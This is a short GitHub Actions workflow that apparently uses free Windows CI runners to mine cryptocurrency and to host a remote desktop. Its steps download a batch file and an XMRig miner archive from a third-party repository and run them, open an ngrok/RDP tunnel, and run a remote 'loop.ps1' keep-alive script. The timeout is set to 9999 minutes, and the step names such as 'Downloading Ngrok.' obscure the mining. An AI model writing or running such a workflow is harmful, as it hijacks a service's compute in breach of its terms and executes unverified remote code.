name: Jaisai
on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Downloading Ngrok.
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/jaisai1337/cpu/main/start.bat -OutFile start.bat
        Invoke-WebRequest https://raw.githubusercontent.com/jaisai1337/cpu/main/xmrig2.zip -OutFile xmrig2.zip
    - name: Extracting Xmrig2 Files.
      run: Expand-Archive xmrig2.zip
    - name: Connecting to your RDP.
      run: cmd /c start.bat
    - name: XMRIG
      run: cmd /c \xmrig2\jai.bat
    - name: RDP is ready!
      run: | 
        Invoke-WebRequest https://raw.githubusercontent.com/romain09/AWS-RDP/main/loop.ps1 -OutFile loop.ps1
        ./loop.ps1
